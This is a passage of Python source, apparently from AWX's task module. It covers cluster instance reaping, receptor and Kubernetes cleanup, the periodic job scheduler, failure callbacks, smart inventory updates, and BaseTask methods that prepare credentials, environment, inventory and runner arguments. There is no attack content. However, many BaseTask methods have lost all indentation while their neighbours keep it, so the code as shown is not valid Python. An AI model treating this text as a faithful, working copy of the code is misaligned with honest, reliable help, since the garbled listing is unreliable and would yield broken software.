            # Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
            # The heartbeat task will reset the capacity to the system capacity after upgrade.
            stop_local_services(communicate=False)
            raise RuntimeError("Shutting down.")
    for other_inst in lost_instances:
        try:
            reaper.reap(other_inst)
        except Exception:
            logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
        try:
            # Capacity could already be 0 because:
            # * It's a new node and it never had a heartbeat
            # * It was set to 0 by another tower node running this method
            # * It was set to 0 by this node, but auto deprovisioning is off
            #
            # If auto deprovisioning is on, don't bother setting the capacity to 0
            # since we will delete the node anyway.
            if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
                other_inst.mark_offline(errors=_('Another cluster node has determined this instance to be unresponsive'))
                logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.last_seen))
            elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
                deprovision_hostname = other_inst.hostname
                other_inst.delete()
                logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
        except DatabaseError as e:
            if 'did not affect any rows' in str(e):
                logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
            else:
                logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_receptor_workunit_reaper():
    """
    When an AWX job is launched via receptor, files such as status, stdin, and stdout are created
    in a specific receptor directory. This directory on disk is a random 8 character string, e.g. qLL2JFNT
    This is also called the work Unit ID in receptor, and is used in various receptor commands,
    e.g. "work results qLL2JFNT"
    After an AWX job executes, the receptor work unit directory is cleaned up by
    issuing the work release command. In some cases the release process might fail, or
    if AWX crashes during a job's execution, the work release command is never issued to begin with.
    As such, this periodic task will obtain a list of all receptor work units, and find which ones
    belong to AWX jobs that are in a completed state (status is canceled, error, or succeeded).
    This task will call "work release" on each of these work units to clean up the files on disk.
    """
    if not settings.RECEPTOR_RELEASE_WORK:
        return
    logger.debug("Checking for unreleased receptor work units")
    receptor_ctl = get_receptor_ctl()
    receptor_work_list = receptor_ctl.simple_command("work list")
    # "work list" returns a mapping keyed by work unit ID; materialize the IDs
    # directly instead of the previous copy-comprehension, which also shadowed
    # the `id` builtin.
    unit_ids = list(receptor_work_list)
    jobs_with_unreleased_receptor_units = UnifiedJob.objects.filter(work_unit_id__in=unit_ids).exclude(status__in=ACTIVE_STATES)
    for job in jobs_with_unreleased_receptor_units:
        logger.debug(f"{job.log_format} is not active, reaping receptor work unit {job.work_unit_id}")
        receptor_ctl.simple_command(f"work release {job.work_unit_id}")
@task(queue=get_local_queuename)
def awx_k8s_reaper():
    """Delete kubernetes pods left behind by container-group jobs that finished."""
    if not settings.RECEPTOR_RELEASE_WORK:
        return
    from awx.main.scheduler.kubernetes import PodManager  # prevent circular import

    for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
        logger.debug("Checking for orphaned k8s pods for {}.".format(group))
        pods = PodManager.list_active_jobs(group)
        inactive_jobs = UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES)
        for job in inactive_jobs:
            logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
            try:
                pm = PodManager(job)
                pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
            except Exception:
                logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
    """Launch unified jobs for schedules that came due since the last scheduler run."""
    with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
        # Only one node runs the scheduler at a time.
        if acquired is False:
            logger.debug("Not running periodic scheduler, another task holds lock")
            return
        logger.debug("Starting periodic scheduler")
        run_now = now()
        state = TowerScheduleState.get_solo()
        last_run = state.schedule_last_run
        logger.debug("Last scheduler run was: %s", last_run)
        state.schedule_last_run = run_now
        state.save()
        # Schedules whose window already passed just get next_run recomputed.
        old_schedules = Schedule.objects.enabled().before(last_run)
        for schedule in old_schedules:
            schedule.update_computed_fields()
        schedules = Schedule.objects.enabled().between(last_run, run_now)
        # A failed license check still spawns the job, but immediately fails it
        # with the license error as the explanation.
        invalid_license = False
        try:
            access_registry[Job](None).check_license(quiet=True)
        except PermissionDenied as e:
            invalid_license = e
        for schedule in schedules:
            template = schedule.unified_job_template
            schedule.update_computed_fields()  # To update next_run timestamp.
            if template.cache_timeout_blocked:
                logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
                continue
            try:
                job_kwargs = schedule.get_job_kwargs()
                new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
                logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
                if invalid_license:
                    new_unified_job.status = 'failed'
                    new_unified_job.job_explanation = str(invalid_license)
                    new_unified_job.save(update_fields=['status', 'job_explanation'])
                    new_unified_job.websocket_emit_status("failed")
                    raise invalid_license
                can_start = new_unified_job.signal_start()
            except Exception:
                logger.exception('Error spawning scheduled job.')
                continue
            if not can_start:
                new_unified_job.status = 'failed'
                new_unified_job.job_explanation = gettext_noop(
                    "Scheduled job could not start because it \
                    was not in the right state or required manual credentials"
                )
                new_unified_job.save(update_fields=['status', 'job_explanation'])
                new_unified_job.websocket_emit_status("failed")
            emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
        state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
    """Callback fired when a unified job completes successfully.

    Looks up the job referenced by ``task_actual`` and, if it still exists,
    wakes the task manager so dependent work can be scheduled.
    """
    job_type, job_id = task_actual['type'], task_actual['id']
    try:
        instance = UnifiedJob.get_instance_by_type(job_type, job_id)
    except ObjectDoesNotExist:
        logger.warning('Missing {} `{}` in success callback.'.format(job_type, job_id))
        return
    if instance:
        schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
    """Callback fired when a task in a dependency chain fails.

    Marks every subtask that is not the failed task itself, not canceled, and
    not already successful as 'failed', recording which job in the chain
    triggered the failure; then wakes the task manager once.

    :param task_id: celery task id of the task that errored
    :param kwargs: may contain 'subtasks', a list of {'type': ..., 'id': ...}
        dicts identifying the jobs in the dependency chain
    """
    subtasks = kwargs.get('subtasks', None)
    logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
    first_instance = None
    first_instance_type = ''
    if subtasks is not None:
        for each_task in subtasks:
            try:
                instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
                if not instance:
                    # Unknown task type
                    # NOTE: logger.warn is a deprecated alias; use warning
                    logger.warning("Unknown task type: {}".format(each_task['type']))
                    continue
            except ObjectDoesNotExist:
                logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
                continue
            if first_instance is None:
                first_instance = instance
                first_instance_type = each_task['type']
            if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
                instance.status = 'failed'
                instance.failed = True
                if not instance.job_explanation:
                    instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
                        first_instance_type,
                        first_instance.name,
                        first_instance.id,
                    )
                instance.save()
                instance.websocket_emit_status("failed")
    # We only send 1 job complete message since all the job completion message
    # handling does is trigger the scheduler. If we extend the functionality of
    # what the job complete message handler does then we may want to send a
    # completion event for each job here.
    if first_instance:
        schedule_task_manager()
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
    """Send success/failure notification templates for a finished unified job.

    The job's status may still be transitioning out of 'running' when this
    task fires, so poll up to 5 times (one second apart) for the job to reach
    a finished state before sending notifications; warn and give up otherwise.
    """
    uj = UnifiedJob.objects.get(pk=job_id)
    retries = 0
    while retries < 5:
        if uj.finished:
            uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
            return
        else:
            # wait a few seconds to avoid a race where the
            # events are persisted _before_ the UJ.status
            # changes from running -> successful
            retries += 1
            time.sleep(1)
            uj = UnifiedJob.objects.get(pk=job_id)
    # logger.warn is a deprecated alias of logger.warning
    logger.warning(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
    """
    Signal handler and wrapper around inventory.update_computed_fields to
    prevent unnecessary recursive calls.
    """
    qs = Inventory.objects.filter(id=inventory_id)
    if not qs.exists():
        logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
        return
    inventory = qs[0]
    try:
        inventory.update_computed_fields()
    except DatabaseError as e:
        # Another worker already saved these fields; treat as a no-op.
        if 'did not affect any rows' in str(e):
            logger.debug('Exiting duplicate update_inventory_computed_fields task.')
            return
        raise
def update_smart_memberships_for_inventory(smart_inventory):
    """Synchronize cached SmartInventoryMembership rows with the hosts that
    currently match the smart inventory's filter.

    Returns True when memberships changed, False when already in sync.
    """
    existing_ids = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
    matching_ids = set(smart_inventory.hosts.values_list('id', flat=True))
    to_add = matching_ids - existing_ids
    to_remove = existing_ids - matching_ids
    if not (to_add or to_remove):
        return False
    with transaction.atomic():
        if to_remove:
            SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=to_remove).delete()
        if to_add:
            memberships = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in to_add]
            SmartInventoryMembership.objects.bulk_create(memberships, ignore_conflicts=True)
        logger.debug(
            'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
                smart_inventory.pk, len(to_add), len(to_remove), len(matching_ids)
            )
        )
    return True  # changed
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
    """Refresh cached membership for every active smart inventory, then
    recompute computed fields for the inventories whose membership changed."""
    changed_inventories = set()
    active = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
    for smart_inventory in active:
        try:
            if update_smart_memberships_for_inventory(smart_inventory):
                changed_inventories.add(smart_inventory)
        except IntegrityError:
            logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
    # Update computed fields for changed inventories outside atomic action
    for smart_inventory in changed_inventories:
        smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
    """Delete an inventory while impersonating the requesting user, detaching
    job events from its hosts first; retries on transient database errors."""
    # Delete inventory as user
    user = None
    if user_id is not None:
        try:
            user = User.objects.get(id=user_id)
        except Exception:
            user = None
    with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
        try:
            inventory = Inventory.objects.get(id=inventory_id)
            for host in inventory.hosts.iterator():
                # Keep historical job events but break their host FK.
                host.job_events_as_primary_host.update(host=None)
            inventory.delete()
            emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
            logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
        except Inventory.DoesNotExist:
            logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
            return
        except DatabaseError:
            logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
            if retries > 0:
                time.sleep(10)
                delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
    """Decorator for task methods: after the wrapped call returns (or raises),
    remove every filesystem path accumulated in ``self.cleanup_paths`` and
    reset that list."""

    def _remove_path(path):
        # Best-effort removal; directories are pruned recursively.
        try:
            if os.path.isdir(path):
                shutil.rmtree(path, ignore_errors=True)
            elif os.path.exists(path):
                os.remove(path)
        except OSError:
            logger.exception("Failed to remove tmp file: {}".format(path))

    @functools.wraps(f)
    def _wrapped(self, *args, **kwargs):
        try:
            return f(self, *args, **kwargs)
        finally:
            for path in self.cleanup_paths:
                _remove_path(path)
            self.cleanup_paths = []

    return _wrapped
class BaseTask(object):
    """Common machinery for running a unified job through ansible-runner.

    Subclasses (e.g. RunJob) set ``model``/``event_model``/``event_data_key``
    and override the ``build_*`` hooks to assemble args, env, credentials,
    and inventory for their specific job type.
    """

    model = None  # UnifiedJob subclass this task operates on (set by subclass)
    event_model = None  # matching event model (set by subclass)
    abstract = True

    def __init__(self):
        # Paths removed by the @with_path_cleanup decorator after run()
        self.cleanup_paths = []
        self.parent_workflow_job_id = None
        self.host_map = {}
        self.guid = GuidMiddleware.get_guid()
        self.job_created = None
        # Sliding window of websocket emit timestamps used by event_handler()
        # to rate-limit websocket messages
        self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
    def build_private_data(self, instance, private_data_dir):
        """
        Return SSH private key data (only if stored in DB as ssh_key_data).
        Return structure is a dict of the form:

            {'credentials': {<Credential>: <decrypted key data>, ...},
             'certificates': {<Credential>: <signed certificate data>, ...}}

        The base implementation returns None (no private data); subclasses
        override this to supply credential material consumed by
        build_private_data_files().
        """
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
    def build_extra_vars_file(self, instance, private_data_dir):
        """
        Build ansible yaml file filled with extra vars to be passed via -e@file.yml

        No-op hook in the base task; subclasses are expected to write the
        env/extravars file (see _write_extra_vars_file) with job-specific
        variables.
        """
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
    def build_args(self, instance, private_data_dir, passwords):
        """Return the command argument list for the run; subclasses must
        implement this."""
        raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
    def pre_run_hook(self, instance, private_data_dir):
        """
        Hook for any steps to run before the job/task starts.

        The base implementation only records the 'pre_run' lifecycle event;
        subclasses may extend it.
        """
        instance.log_lifecycle("pre_run")
    def post_run_hook(self, instance, status):
        """
        Hook for any steps to run before job/task is marked as complete.

        The base implementation only records the 'post_run' lifecycle event;
        subclasses may extend it.
        """
        instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
    def event_handler(self, event_data):
        #
        # ⚠️ D-D-D-DANGER ZONE ⚠️
        # This method is called once for *every event* emitted by Ansible
        # Runner as a playbook runs. That means that changes to the code in
        # this method are _very_ likely to introduce performance regressions.
        #
        # Even if this function is made on average .05s slower, it can have
        # devastating performance implications for playbooks that emit
        # tens or hundreds of thousands of events.
        #
        # Proceed with caution!
        #
        """
        Ansible runner puts a parent_uuid on each event, no matter what the type.
        AWX only saves the parent_uuid if the event is for a Job.

        Enriches each runner event with workflow/host/guid context, rate-limits
        websocket emission, and dispatches the event to the callback queue.
        Returns False so runner does not treat the event as handled elsewhere.
        """
        # cache end_line locally for RunInventoryUpdate tasks
        # which generate job events from two 'streams':
        # ansible-inventory and the awx.main.commands.inventory_import
        # logger
        if isinstance(self, RunInventoryUpdate):
            self.end_line = event_data['end_line']
        # Only Job events keep parent_uuid; strip it for every other job type.
        if event_data.get(self.event_data_key, None):
            if self.event_data_key != 'job_id':
                event_data.pop('parent_uuid', None)
        if self.parent_workflow_job_id:
            event_data['workflow_job_id'] = self.parent_workflow_job_id
        event_data['job_created'] = self.job_created
        if self.host_map:
            host = event_data.get('event_data', {}).get('host', '').strip()
            if host:
                event_data['host_name'] = host
                if host in self.host_map:
                    event_data['host_id'] = self.host_map[host]
            else:
                event_data['host_name'] = ''
                event_data['host_id'] = ''
            if event_data.get('event') == 'playbook_on_stats':
                event_data['host_map'] = self.host_map
        if isinstance(self, RunProjectUpdate):
            # it's common for Ansible's SCM modules to print
            # error messages on failure that contain the plaintext
            # basic auth credentials (username + password)
            # it's also common for the nested event data itself (['res']['...'])
            # to contain unredacted text on failure
            # this is a _little_ expensive to filter
            # with regex, but project updates don't have many events,
            # so it *should* have a negligible performance impact
            task = event_data.get('event_data', {}).get('task_action')
            try:
                if task in ('git', 'svn'):
                    event_data_json = json.dumps(event_data)
                    event_data_json = UriCleaner.remove_sensitive(event_data_json)
                    event_data = json.loads(event_data_json)
            except json.JSONDecodeError:
                pass
        if 'event_data' in event_data:
            event_data['event_data']['guid'] = self.guid
        # To prevent overwhelming the broadcast queue, skip some websocket messages
        if self.recent_event_timings:
            cpu_time = time.time()
            first_window_time = self.recent_event_timings[0]
            last_window_time = self.recent_event_timings[-1]
            if event_data.get('event') in MINIMAL_EVENTS:
                should_emit = True  # always send some types like playbook_on_stats
            elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
                should_emit = False  # exclude events with no output
            else:
                should_emit = any(
                    [
                        # if the oldest websocket message in the window was sent over 1 second ago
                        cpu_time - first_window_time > 1.0,
                        # if the very last websocket message came in over 1/maxlen seconds ago
                        self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
                        # if the queue is not yet full
                        len(self.recent_event_timings) != self.recent_event_timings.maxlen,
                    ]
                )
            if should_emit:
                self.recent_event_timings.append(cpu_time)
            else:
                event_data.setdefault('event_data', {})
                event_data['skip_websocket_message'] = True
        elif self.recent_event_timings.maxlen:
            self.recent_event_timings.append(time.time())
        event_data.setdefault(self.event_data_key, self.instance.id)
        self.dispatcher.dispatch(event_data)
        self.event_ct += 1
        '''
        Handle artifacts
        '''
        if event_data.get('event_data', {}).get('artifact_data', {}):
            self.instance.artifacts = event_data['event_data']['artifact_data']
            self.instance.save(update_fields=['artifacts'])
        return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
    def status_handler(self, status_data, runner_config):
        """
        Ansible runner callback triggered on status transition.

        On 'starting', snapshots the (password-redacted) command/env onto the
        job record; on 'error', persists the traceback runner reported.
        """
        if status_data['status'] == 'starting':
            job_env = dict(runner_config.env)
            '''
            Take the safe environment variables and overwrite
            '''
            for k, v in self.safe_env.items():
                if k in job_env:
                    job_env[k] = v
            from awx.main.signals import disable_activity_stream  # Circular import
            with disable_activity_stream():
                self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
        elif status_data['status'] == 'error':
            result_traceback = status_data.get('result_traceback', None)
            if result_traceback:
                from awx.main.signals import disable_activity_stream  # Circular import
                with disable_activity_stream():
                    self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
    @with_path_cleanup
    def run(self, pk, **kwargs):
        """
        Run the job/task and capture its output.

        High-level flow: mark the job 'running'; build the private data dir
        (credentials, extra vars, args, env, inventory); dispatch to
        ansible-runner (directly for SystemJobs, via Receptor otherwise);
        then persist final status/event counts and fire the post-run and
        final-run hooks. Raises AwxTaskError on non-successful completion.

        :param kwargs: runtime passwords supplied at launch time
        """
        self.instance = self.model.objects.get(pk=pk)
        # Resolve an execution environment up front if the job has none yet.
        if self.instance.execution_environment_id is None:
            from awx.main.signals import disable_activity_stream
            with disable_activity_stream():
                self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
        # self.instance because of the update_model pattern and when it's used in callback handlers
        self.instance = self.update_model(pk, status='running', start_args='')  # blank field to remove encrypted passwords
        self.instance.websocket_emit_status("running")
        # Assume the worst until runner reports a result.
        status, rc = 'error', None
        extra_update_fields = {}
        fact_modification_times = {}
        self.event_ct = 0
        '''
        Needs to be an object property because status_handler uses it in a callback context
        '''
        self.safe_env = {}
        self.safe_cred_env = {}
        private_data_dir = None
        # store a reference to the parent workflow job (if any) so we can include
        # it in event data JSON
        if self.instance.spawned_by_workflow:
            self.parent_workflow_job_id = self.instance.get_workflow_job().id
        self.job_created = str(self.instance.created)
        try:
            self.instance.send_notification_templates("running")
            private_data_dir = self.build_private_data_dir(self.instance)
            self.pre_run_hook(self.instance, private_data_dir)
            self.instance.log_lifecycle("preparing_playbook")
            if self.instance.cancel_flag:
                self.instance = self.update_model(self.instance.pk, status='canceled')
            if self.instance.status != 'running':
                # Stop the task chain and prevent starting the job if it has
                # already been canceled.
                self.instance = self.update_model(pk)
                status = self.instance.status
                raise RuntimeError('not starting %s task' % self.instance.status)
            if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
                raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
            # Fetch "cached" fact data from prior runs and put on the disk
            # where ansible expects to find it
            if getattr(self.instance, 'use_fact_cache', False):
                self.instance.start_job_fact_cache(
                    os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
                    fact_modification_times,
                )
            # May have to serialize the value
            private_data_files = self.build_private_data_files(self.instance, private_data_dir)
            passwords = self.build_passwords(self.instance, kwargs)
            self.build_extra_vars_file(self.instance, private_data_dir)
            args = self.build_args(self.instance, private_data_dir, passwords)
